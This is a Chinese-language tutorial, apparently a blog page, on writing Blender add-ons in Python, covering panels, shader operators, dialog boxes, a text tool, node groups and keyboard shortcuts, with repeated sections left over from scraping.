    • 然后是 draw 函数,用于绘制面板上的组件。self.layout 是布局对象,代表整个面板的布局。通过 layout 对象的 row()函数,可以创建一行组件。在这个例子中,首先创建一行 label 文本,然后又创建两个 button,分别调用了mesh.primitive_cube_add添加立方体,mesh.primitive_uv_sphere_add添加球体,最后再创建一个添加文字的按钮。
    • register()函数使用bpy.utils.register_class()方法将 TestPanel 类注册到 Blender 中,使其可用。
    • unregister()函数使用bpy.utils.unregister_class()方法取消注册 TestPanel 类。
    • 最后检查脚本是否在 Blender 内运行,如果是,则执行 register()函数。

    3D Viewport 视图下按 n 可以打开面板。

    jpg

    面板的图标名称可以通过Edit-Preferences-Add-ons-搜索icon-Icon Viewer的方式找到:

    jpg

    带创建物体的英文名称可以通过下图方式找到:

    jpg

    Finishing the Object Adder Add-on

    继续完善之前写的插件:

    bl_info = {
    'name': 'Object Adder',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Mesh',

    }

    import bpy


    class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
    layout = self.layout
    layout.scale_y = 1.4

    row = layout.row()
    row.label(text='Add an object', icon='OBJECT_ORIGIN')
    row = layout.row()
    row.operator('mesh.primitive_cube_add', icon='CUBE')
    row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
    row = layout.row()
    row.operator('object.text_add', icon='FILE_FONT')


    class PanelA(bpy.types.Panel):
    bl_label = "Scale"
    bl_idname = "PT_PanelA"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout
    obj = context.object

    row = layout.row()
    row.label(text='Select an option to scale your object.', icon='FONT_DATA')
    row = layout.row()
    row.operator('transform.resize')
    row = layout.row()
    layout.scale_y = 1.2

    col = layout.column()
    col.prop(obj, 'scale')


    class PanelB(bpy.types.Panel):
    bl_label = "Specials"
    bl_idname = "PT_PanelB"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Select a Special Option', icon='COLOR_BLUE')
    row = layout.row()
    row.operator('object.shade_smooth', icon='MOD_SMOOTH', text='Set Smooth Shading')
    row.operator('object.subdivision_set')
    row = layout.row()
    row.operator('object.modifier_add')


    def register():
    bpy.utils.register_class(TestPanel)
    bpy.utils.register_class(PanelA)
    bpy.utils.register_class(PanelB)


    def unregister():
    bpy.utils.unsregister_class(TestPanel)
    bpy.utils.unregister_class(PanelA)
    bpy.utils.register_class(PanelB)


    if __name__ == '__main__':
    register()

    jpg

    也可以通过 Edit-Preferences-Install... 的方式安装其他人写好的插件:

    jpg

    Preview: The Shader Library Add-on (Python Tutorial Result)

    How to create an Addon (The Shader Library)

    教你怎么用 Python 写一个 Shader 插件:

    调整窗口布局,一个 Shader Editor,一个 3D Viewport,一个 Text Editor:

    jpg

    这段代码定义了一个名为"Shader Libraey"的 Blender 插件,该插件提供了一个名为"Diamond"的着色器,可以在 3D 视图的工具栏中的"Shader Library"选项卡中访问。当用户点击该选项卡时,将显示一个面板,其中包含一个"选择要添加的着色器"标签和一个"Diamond"按钮,当用户单击该按钮时,将创建一个着色器并应用于活动对象上。

    具体而言,该代码文件首先定义了包含插件名称、作者、版本等信息的字典。接下来定义了一个面板类 ShaderMainPanel,它作为面板的主要控件,用于渲染用户界面。该面板包含一个文本标签和一个名为"shader.diamond_operator"的操作器,后者定义了所需的 Diamond 着色器。在操作器的 execute()函数中,创建一个新材质,激活其节点编辑模式,删除默认的 Principled BSDF 节点,然后创建和连接多个颜色为红、绿、蓝的玻璃节点,最后创建混合节点和连接多个节点以生成最终的 Diamond 着色器,将其分配给当前活动对象。

    最后,定义了两个函数 register()和 unregister(),它们用于在 Blender 应用程序中注册和取消注册插件的类。

    bl_info = {
    'name': 'Shader Libraey',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Shader',

    }

    import bpy


    class ShaderMainPanel(bpy.types.Panel):
    bl_label = "Shader Library"
    bl_idname = "SHADER_PT_MAINPANEL"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Shader Library"

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Select a Shader to be added.')
    row.operator('shader.diamond_operator')


    # Create a Custom Operator for the Diamond Shader
    class SHADER_OT_DIAMOND(bpy.types.Operator):
    bl_label = "Diamond"
    bl_idname = "shader.diamond_operator"

    def execute(self, context):
    # Creating a New Shader and calling it Diamond
    material_diamond = bpy.data.materials.new(name="Diamond")
    # Enabling Use Nodes
    material_diamond.use_nodes = True
    # Removing the Principled Node
    material_diamond.node_tree.nodes.remove(material_diamond.node_tree.nodes.get('Principled BSDF'))
    # Create a reference to the Material Output
    material_output = material_diamond.node_tree.nodes.get('Material Output')
    # Set location of node
    material_output.location = (-400,0)

    # Adding Glass1 Node
    glass1_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass1_node.location = (-600,0)
    # Setting the Default Color
    glass1_node.inputs[0].default_value = (1, 0, 0, 1)
    # Setting the Default IOR Value
    glass1_node.inputs[2].default_value = 1.446

    # Adding Glass2 Node
    glass2_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass2_node.location = (-600, -150)
    # Setting the Default Color
    glass2_node.inputs[0].default_value = (0, 1, 0, 1)
    # Setting the Default IOR Value
    glass2_node.inputs[2].default_value = 1.450

    # Adding Glass3 Node
    glass3_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass3_node.location = (-600, -300)
    # Setting the Default Color
    glass3_node.inputs[0].default_value = (0, 0, 1, 1)
    # Setting the Default IOR Value
    glass3_node.inputs[2].default_value = 1.450

    # Create the Add Shader Node and Reference it as 'Add1'
    add1_node = material_diamond.node_tree.nodes.new('ShaderNodeAddShader')
    # Setting the Location
    add1_node.location = (-400,-50)
    # Setting the Label
    add1_node.label = "Add 1"
    # Minimizes the Node
    add1_node.hide = True
    # Deselect the Node
    add1_node.select = False

    # Create the Add Shader Node and Reference it as 'Add2'
    add2_node = material_diamond.node_tree.nodes.new('ShaderNodeAddShader')
    # Setting the Location
    add2_node.location = (0,0)
    # Setting the Label
    add2_node.label = "Add 2"
    # Minimizes the Node
    add2_node.hide = True
    # Deselect the Node
    add2_node.select = False

    # Adding Glass4 Node
    glass4_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass4_node.location = (-150, -150)
    # Setting the Default Color
    glass4_node.inputs[0].default_value = (1, 1, 1, 1)
    # Setting the Default IOR Value
    glass4_node.inputs[2].default_value = 1.450
    # Deselect the Node
    glass4_node.select = False

    # Create the Mix Shader Node and Reference it as 'Mix1'
    mix1_node = material_diamond.node_tree.nodes.new('ShaderNodeMixShader')
    # Setting the Location
    mix1_node.location = (200,0)
    # Deselect the Node
    mix1_node.select = False

    # Creating Links between the Nodes
    material_diamond.node_tree.links.new(glass1_node.outputs[0], add1_node.inputs[0])
    material_diamond.node_tree.links.new(glass2_node.outputs[0], add1_node.inputs[1])
    material_diamond.node_tree.links.new(add1_node.outputs[0], add2_node.inputs[0])
    material_diamond.node_tree.links.new(glass3_node.outputs[0], add2_node.inputs[1])
    material_diamond.node_tree.links.new(add2_node.outputs[0], mix1_node.inputs[1])
    material_diamond.node_tree.links.new(glass4_node.outputs[0], mix1_node.inputs[2])
    material_diamond.node_tree.links.new(mix1_node.outputs[0], material_output.inputs[0])
    bpy.context.object.active_material = material_diamond

    return {'FINISHED'}


    def register():
    bpy.utils.register_class(ShaderMainPanel)
    bpy.utils.register_class(SHADER_OT_DIAMOND)


    def unregister():
    bpy.utils.unregister_class(ShaderMainPanel)
    bpy.utils.unregister_class(SHADER_OT_DIAMOND)


    if __name__ == '__main__':
    register()

    Edit-Preferences-Add-ons-搜索extra-Add Mesh: Extra Objects,这样 Blender 中就可以创建钻石形状的物体。

    jpg

    创建一个钻石形状的物体,运行代码,点击 Diamond,就给该物体添加了一个 Shader:

    jpg

    可以从 Darkfall : Blender Python Tutorial: How to create an Add-on - The Shader Library [bpy] (darkfallblender.blogspot.com) 中的 ShaderLibrary.py - Google Drive 下载作者写的更复杂的 ShaderLibrary.py

    Add a keyframe & Modifier with Python [learn python for beginners]

    这段代码定义了一个名为"Hello World Panel"的 Blender 插件,该插件提供了一个名为"Neon"的着色器,可以在 3D 视图的工具栏中的"Name your New Tab"选项卡中访问。当用户点击该选项卡时,将显示一个面板,其中包含一个"Add Neon Shader"按钮,当用户单击该按钮时,将创建一个着色器并应用于活动对象上。

    具体而言,该代码文件首先定义了一个名为 HelloWorldPanel 的面板类,该类作为面板的主要控件,用于渲染用户界面。该面板包含一个按钮,名为"shader.neon_operator"。在操作器的 execute()函数中,创建一个新材质,激活其节点编辑模式,删除默认的 Principled BSDF 节点,然后创建和连接多个颜色为蓝色、灰色的玻璃节点,最后创建混合节点和连接多个节点以生成最终的 Neon 着色器,将其分配给当前活动对象。

    最后,定义了两个函数 register()和 unregister(),它们用于在 Blender 应用程序中注册和取消注册插件的类。

    import bpy


    class HelloWorldPanel(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Hello World Panel"
    bl_idname = "OBJECT_PT_hello"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Name your New Tab"

    def draw(self, context):
    layout = self.layout

    obj = context.object

    row = layout.row()
    row.operator('shader.neon_operator')


    class SHADER_OT_NEON(bpy.types.Operator):
    bl_label = 'Add Neon Shader'
    bl_idname = 'shader.neon_operator'

    def execute(self, context):
    cur_frame = bpy.context.scene.frame_current

    # Creating a New Shader and calling it Neon
    material_neon = bpy.data.materials.new(name= "Neon")
    # Enabling Use Nodes
    material_neon.use_nodes = True

    tree = material_neon.node_tree

    # removing the Principled Node
    material_neon.node_tree.nodes.remove(material_neon.node_tree.nodes.get('Principled BSDF'))
    # Create a reference to the Material Output
    material_output = material_neon.node_tree.nodes.get('Material Output')
    # Set location of node
    material_output.location = (400,0)

    # Adding Glass1 Node
    emiss_node = material_neon.node_tree.nodes.new('ShaderNodeEmission')
    # Set location of node
    emiss_node.location = (200,0)
    # Setting the Default Color
    emiss_node.inputs[0].default_value = (0.59, 0.76, 1, 1)
    # Setting the Default IOR Value
    emiss_node.inputs[1].default_value = 2
    emiss_node.inputs[1].keyframe_insert('default_value', frame=cur_frame)

    data_path = f'nodes["{emiss_node.name}"].inputs[1].default_value'

    fcurves = tree.animation_data.action.fcurves
    fc = fcurves.find(data_path)
    if fc:
    new_mod = fc.modifiers.new('NOISE')
    new_mod.strength = 10
    new_mod.depth = 1

    material_neon.node_tree.links.new(emiss_node.outputs[0], material_output.inputs[0])

    return {'FINISHED'}

    def register():
    bpy.utils.register_class(HelloWorldPanel)
    bpy.utils.register_class(SHADER_OT_NEON)


    def unregister():
    bpy.utils.unregister_class(HelloWorldPanel)
    bpy.utils.unregister_class(SHADER_OT_NEON)


    if __name__ == "__main__":
    register()

    创建了一个 shader 和一个 modifiers,使得绑定的物体一闪一闪的。

    jpg

    Create a popup dialog box

    定义了一个 WM_OT_myOp 类,提供了一个 dialog box 提示,原视频的 Blender 版本有点旧,替换了一些代码:

    class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):

    t = self.text
    s = self.scale

    bpy.ops.mesh.primitive_cube_add()
    obj = bpy.context.object
    obj.name = t
    obj.scale[0] = s[0]
    obj.scale[1] = s[1]
    obj.scale[2] = s[2]

    return {'FINISHED'}


    def invoke(self, context, event):

    return context.window_manager.invoke_props_dialog(self)

    整合到之前的 AddObjectScript.py 中,代码 row.operator('wm.myop', icon='CUBE', text='Cube') 将创建的 bl_idname = 'wm.myop'WM_OT_myOp 加入到 TestPanel 中:

    bl_info = {
    'name': 'Object Adder',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Mesh',

    }

    import bpy


    class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
    layout = self.layout
    layout.scale_y = 1.4

    row = layout.row()
    row.label(text='Add an object', icon='OBJECT_ORIGIN')
    row = layout.row()
    row.operator('wm.myop', icon='CUBE', text='Cube')
    row = layout.row()
    row.operator('mesh.primitive_cube_add', icon='CUBE')
    row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
    row = layout.row()
    row.operator('object.text_add', icon='FILE_FONT')


    class PanelA(bpy.types.Panel):
    bl_label = "Scale"
    bl_idname = "PT_PanelA"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout
    obj = context.object

    row = layout.row()
    row.label(text='Select an option to scale your object.', icon='FONT_DATA')
    row = layout.row()
    row.operator('transform.resize')
    row = layout.row()
    layout.scale_y = 1.2

    col = layout.column()
    col.prop(obj, 'scale')


    class PanelB(bpy.types.Panel):
    bl_label = "Specials"
    bl_idname = "PT_PanelB"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Select a Special Option', icon='COLOR_BLUE')
    row = layout.row()
    row.operator('object.shade_smooth', icon='MOD_SMOOTH', text='Set Smooth Shading')
    row.operator('object.subdivision_set')
    row = layout.row()
    row.operator('object.modifier_add')


    class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):

    t = self.text
    s = self.scale

    bpy.ops.mesh.primitive_cube_add()
    obj = bpy.context.object
    obj.name = t
    obj.scale[0] = s[0]
    obj.scale[1] = s[1]
    obj.scale[2] = s[2]

    return {'FINISHED'}


    def invoke(self, context, event):

    return context.window_manager.invoke_props_dialog(self)


    def register():
    bpy.utils.register_class(TestPanel)
    bpy.utils.register_class(PanelA)
    bpy.utils.register_class(PanelB)
    bpy.utils.register_class(WM_OT_myOp)


    def unregister():
    bpy.utils.unsregister_class(TestPanel)
    bpy.utils.unregister_class(PanelA)
    bpy.utils.register_class(PanelB)
    bpy.utils.unregister_class(WM_OT_myOp)


    if __name__ == '__main__':
    register()

    开跑!点击 OK 就会创建一个相应名称和 Scale 的立方体。

    jpg

    Creating the Text Tool Add-on

    这是一个简单的 Blender 插件,提供了一个 “Text Tool” 面板,用于添加文本对象。插件为用户提供了一些选项,如文本内容、比例尺度、是否居中编辑原点、是否挤压等。

    在代码的开头,bl_info 字典定义了插件的基本信息,包括名称、作者、版本、Blender 版本要求、描述等等。这些信息将会在 Blender 中进行显示和识别。

    OBJECT_PT_TextTool 类定义了插件的 UI 面板,在 View3D 视图中的 “Add” 菜单下可以找到它。面板中有一个按钮,用于调用 WM_OT_textOp 操作器类,添加指定的文本对象。

    WM_OT_textOp 操作器类定义了添加文本对象的过程,并通过执行 execute() 方法在场景中添加文本对象。使用 invoke() 方法显示属性对话框,以便用户可以设置文本对象的属性。

    在代码的末尾,register() 方法用于注册插件的类,unregister() 方法用于注销这些类。这使得 Blender 工具栏能够正确地显示插件,并在需要时供用户使用。

    bl_info = {
    "name": "Text Tool",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (3, 51, 0),
    "location": "View3D > Add > Mesh > New Object",
    "description": "Adds a new Mesh Object",
    "warning": "",
    "doc_url": "",
    "category": "Add Mesh",
    }

    import bpy

    class OBJECT_PT_TextTool(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Text Tool"
    bl_idname = "OBJECT_PT_TextTool"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Text Tool'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.operator('wm.textop', text='Add Text', icon='OUTLINER_OB_FONT')


    class WM_OT_textOp(bpy.types.Operator):
    bl_label = 'Text Tool Operator'
    bl_idname = 'wm.textop'

    text: bpy.props.StringProperty(name='Enter Text', default='')
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))
    center: bpy.props.BoolProperty(name='Center Origin', default=False)
    extrude: bpy.props.BoolProperty(name='Extrude', default=False)
    extrude_amount: bpy.props.FloatProperty(name='Extrude Amount', default=0.06)

    def execute(self, context):

    t = self.text
    s = self.scale
    c = self.center
    e = self.extrude
    ea = self.extrude_amount

    bpy.ops.object.text_add(enter_editmode=True, location=(0, 0, 0))
    bpy.ops.font.delete(type='PREVIOUS_WORD')
    bpy.ops.font.text_insert(text=t)
    bpy.ops.object.editmode_toggle()

    if e == True:
    bpy.context.object.data.extrude = ea

    if c == True:
    bpy.context.object.data.align_x = 'CENTER'
    bpy.context.object.data.align_y = 'CENTER'
    return {'FINISHED'}

    def invoke(self, context, event):
    return context.window_manager.invoke_props_dialog(self)


    def register():
    bpy.utils.register_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


    def unregister():
    bpy.utils.unregister_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


    if __name__ == "__main__":
    register()

    这将创建一个文字,是否居中和具有高度都是可选的。

    jpg

    Create Custom Node Group

    Blender 的节点组是将多个节点整合在一起,以便于在不同的场景中重复使用。通过创建自定义节点组,用户可以自定义一组节点,然后在需要时将它们重复使用,而无需每次都手动连接一堆节点。

    节点组可以包含多个输入和输出,这使得节点的使用更加灵活。例如,可以将某个算法封装在一个自定义节点组中,然后将其作为子程序一样反复使用,从而使整个工作流程更加高效。

    除此之外,节点组还可以将多个节点封装在一起,隐藏内部的复杂性,从而简化整个项目的结构和管理。如果想要共享或者将你的节点组应用到其他项目中,你可以将它们保存为 .blend 文件或者 Python 脚本。

    总之,节点组是 Blender 中非常实用的功能之一,它可以帮助用户提高工作效率,并简化项目管理流程,同时也使 Blender 更加强大和灵活。

    这段代码是一个 Blender 插件,用于创建自定义节点组。

    首先,代码定义了一个 NODE_PT_MAINPANEL 类,继承自 bpy.types.Panel 类,表示一个面板面板,包含在节点编辑器(NODE_EDITOR)中的 UI 区域(UI),并将其放在「New Tab」分类下。bl_label 设置面板名称为「Custom Node Group」,bl_idname 表示唯一 ID,用于在代码中引用该面板。

    create_test_group() 函数用于创建节点组。它接收三个参数:context 对象、operator 对象和 group_name 字符串。此函数使用 bpy.data.node_groups.new() 创建一个新的节点组对象,并设置其类型为 'CompositorNodeTree',意味着创建一个合成节点树。接下来,该函数创建输入和输出节点,以及两个中间节点,并将它们连接起来。最后,该函数返回新创建的节点组对象。

    NODE_OT_TEST 类继承自 bpy.types.Operator 类,代表一个操作员。bl_label 表示该操作员的名称,bl_idname 表示唯一 ID,用于在代码中引用该操作员。execute() 方法在执行该操作员时被调用,可以看到该方法调用 create_test_group() 函数创建自定义节点组,并将其添加到场景中。

    最后,register()unregister() 函数分别用于注册和注销 Blender 插件。register_class()unregister_class() 方法被用于添加和移除定义的面板(NODE_PT_MAINPANEL)和操作员(NODE_OT_TEST),使它们在 Blender 中可用。if __name__ == "__main__": 代码块用于直接运行该脚本。这个代码块中的 register() 方法将插件注册到 Blender 中,使它可以在运行时使用。

    import bpy


    class NODE_PT_MAINPANEL(bpy.types.Panel):
    bl_label = "Custom Node Group"
    bl_idname = "NODE_PT_MAINPANEL"
    bl_space_type = 'NODE_EDITOR'
    bl_region_type = 'UI'
    bl_category = 'New Tab'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.operator('node.test_operator')


    def create_test_group(context, operator, group_name):

    # enable use nodes
    bpy.context.scene.use_nodes = True

    test_group = bpy.data.node_groups.new(group_name, 'CompositorNodeTree')

    group_in = test_group.nodes.new('NodeGroupInput')
    group_in.location = (-200,0)
    test_group.inputs.new('NodeSocketFloat','Factor Value') #0
    test_group.inputs.new('NodeSocketColor','Color Input') #1


    group_out = test_group.nodes.new('NodeGroupOutput')
    group_out.location = (400,0)
    test_group.outputs.new('NodeSocketColor','Output')


    mask_node = test_group.nodes.new(type= 'CompositorNodeBoxMask')
    mask_node.location = (0,0)
    mask_node.rotation = 1

    mix_node = test_group.nodes.new(type= 'CompositorNodeMixRGB')
    mix_node.location = (200,0)
    mix_node.use_clamp = True
    mix_node.blend_type = 'OVERLAY'


    link = test_group.links.new

    link(mask_node.outputs[0], mix_node.inputs[1])

    link(group_in.outputs[0], mix_node.inputs[0])
    link(group_in.outputs[1], mix_node.inputs[2])

    link(mix_node.outputs[0], group_out.inputs[0])

    return test_group


    class NODE_OT_TEST(bpy.types.Operator):
    bl_label = "Add Custom Node Group"
    bl_idname = "node.test_operator"

    def execute(self, context):

    custom_node_name = "Test Node"
    my_group = create_test_group(self, context, custom_node_name)
    test_node = context.scene.node_tree.nodes.new('CompositorNodeGroup')
    test_node.node_tree = bpy.data.node_groups[my_group.name]
    test_node.use_custom_color = True
    test_node.color = (0.5, 0.4, 0.3)

    return {'FINISHED'}


    def register():
    bpy.utils.register_class(NODE_PT_MAINPANEL)
    bpy.utils.register_class(NODE_OT_TEST)


    def unregister():
    bpy.utils.unregister_class(NODE_PT_MAINPANEL)
    bpy.utils.unregister_class(NODE_OT_TEST)


    if __name__ == "__main__":
    register()

    Custom Drawing / Layout Improvements

    美化了之前 TextTool.py 的界面:

    bl_info = {
    "name": "Text Tool",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (3, 51, 0),
    "location": "View3D > Add > Mesh > New Object",
    "description": "Adds a new Mesh Object",
    "warning": "",
    "doc_url": "",
    "category": "Add Mesh",
    }

    import bpy

    class OBJECT_PT_TextTool(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Text Tool"
    bl_idname = "OBJECT_PT_TextTool"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Text Tool'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.operator('wm.textop', text='Add Text', icon='OUTLINER_OB_FONT')


    class WM_OT_textOp(bpy.types.Operator):
    bl_label = 'Text Tool Operator'
    bl_idname = 'wm.textop'

    text: bpy.props.StringProperty(name='Enter Text', default='')
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))
    rotation: bpy.props.BoolProperty(name='Z up', default=False)
    center: bpy.props.BoolProperty(name='Center Origin', default=False)
    extrude: bpy.props.BoolProperty(name='Extrude', default=False)
    extrude_amount: bpy.props.FloatProperty(name='Extrude Amount', default=0.06)


    def draw(self, context):
    layout = self.layout
    layout.separator(factor=1)
    layout.label(text='Sample Text')

    layout.prop(self, 'text')
    layout.prop(self, 'scale')

    layout.separator(factor=2)

    box = layout.box()

    row = box.row()
    row.prop(self, 'rotation')
    if self.rotation == True:
    row.label(text='Orientation: Z UP', icon='EMPTY_SINGLE_ARROW')
    else:
    row.label(text='Orientation: Default', icon='ARROW_LEFTRIGHT')

    row = box.row()
    row.prop(self, 'center')
    if self.center == True:
    row.label(text='Alignment: Center', icon='ALIGN_CENTER')
    else:
    row.label(text='Alignment: Default', icon='ALIGN_LEFT')

    row = box.row()
    row.prop(self, 'extrude')
    if self.extrude == True:
    row.prop(self, 'extrude_amount')


    def execute(self, context):

    t = self.text
    s = self.scale
    c = self.center
    e = self.extrude
    ea = self.extrude_amount
    r = self.rotation

    bpy.ops.object.text_add(enter_editmode=True, location=(0, 0, 0))
    bpy.ops.font.delete(type='PREVIOUS_WORD')
    bpy.ops.font.text_insert(text=t)
    bpy.ops.object.editmode_toggle()

    if r == True:
    bpy.context.object.rotation_euler[0] = 1.5708
    if e == True:
    bpy.context.object.data.extrude = ea

    if c == True:
    bpy.context.object.data.align_x = 'CENTER'
    bpy.context.object.data.align_y = 'CENTER'
    return {'FINISHED'}

    def invoke(self, context, event):
    return context.window_manager.invoke_props_dialog(self)


    def register():
    bpy.utils.register_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


    def unregister():
    bpy.utils.unregister_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


    if __name__ == "__main__":
    register()

    jpg

    Shortcut / Custom Keymap [learn python for beginners]

    修改 popupdialogboxTemplate.py,使其可以通过按下 SHIFT+F 打开 dialog box:

    import bpy

    class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):

    t = self.text
    s = self.scale

    bpy.ops.mesh.primitive_cube_add()
    obj = bpy.context.object
    obj.name = t
    obj.scale[0] = s[0]
    obj.scale[1] = s[1]
    obj.scale[2] = s[2]

    return {'FINISHED'}


    def invoke(self, context, event):

    return context.window_manager.invoke_props_dialog(self)


    addon_keymaps = []


    def register():
    bpy.utils.register_class(WM_OT_myOp)

    wm = bpy.context.window_manager
    kc = wm.keyconfigs.addon
    if kc:
    km = kc.keymaps.new(name='3D View', space_type='VIEW_3D')
    kmi = km.keymap_items.new('wm.myop', type='F', value='PRESS', shift=True)
    addon_keymaps.append((km, kmi))


    def unregister():
    for km, kmi in addon_keymaps:
    km.keymap_items.remove(kmi)
    addon_keymaps.clear()
    bpy.utils.unregister_class(WM_OT_myOp)


    if __name__ == '__main__':
    register()

    3D View 中按下 SHIFT+F 就可以打开 dialogbox:

    jpg

    ]]>
    + 资源

    课程

    An Introduction to Scripting

    将视图改成如下图所示,拖动视图的右上角可以分离视图:

    jpg

    编写 python 代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    import bpy

    class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Add an object', icon='CUBE')
    row = layout.row()
    row.operator('mesh.primitive_cube_add', icon='CUBE')
    row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
    row = layout.row()
    row.operator('object.text_add', icon='FILE_FONT')


    def register():
    bpy.utils.register_class(TestPanel)

    def unregister():
    bpy.utils.unsregister_class(TestPanel)


    if __name__ == '__main__':
    register()

    这段 python 代码是在 Blender 中添加一个面板(Panel),面板的名称为“Test Panel”,在 3D 视窗中显示,属于 UI 面板类型,属于"My 1st Addona"类别。这个面板里面添加了三个按钮,分别为添加一个立方体、添加一个球体、添加一个文字。

    具体解释如下:

    • 第一行导入了 blender 的 Python API,可以让我们在 Python 中使用 Blender 的功能。
    • 接下来定义了一个名为 TestPanel 的类,该类继承自 bpy.types.Panel,用于创建面板。bl_label 表示显示的名称,bl_idname 是给面板加上一个独有的 ID,可以在其他地方调用它,bl_space_type 表示要显示在哪种编辑器空间中,这里是VIEW_3D 3D 视窗中显示,bl_region_type 表示要显示在哪个区域内,这里是’UI’ 用户界面标签页。bl_category 表示在哪个类别下进行分组,这里将其放在“My 1st Addona”。
    • 然后是 draw 函数,用于绘制面板上的组件。self.layout 是布局对象,代表整个面板的布局。通过 layout 对象的 row()函数,可以创建一行组件。在这个例子中,首先创建一行 label 文本,然后又创建两个 button,分别调用了mesh.primitive_cube_add添加立方体,mesh.primitive_uv_sphere_add添加球体,最后再创建一个添加文字的按钮。
    • register()函数使用bpy.utils.register_class()方法将 TestPanel 类注册到 Blender 中,使其可用。
    • unregister()函数使用bpy.utils.unregister_class()方法取消注册 TestPanel 类。
    • 最后检查脚本是否在 Blender 内运行,如果是,则执行 register()函数。

    3D Viewport 视图下按 n 可以打开面板。

    jpg

    面板的图标名称可以通过Edit-Preferences-Add-ons-搜索icon-Icon Viewer的方式找到:

    jpg

    带创建物体的英文名称可以通过下图方式找到:

    jpg

    Finishing the Object Adder Add-on

    继续完善之前写的插件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
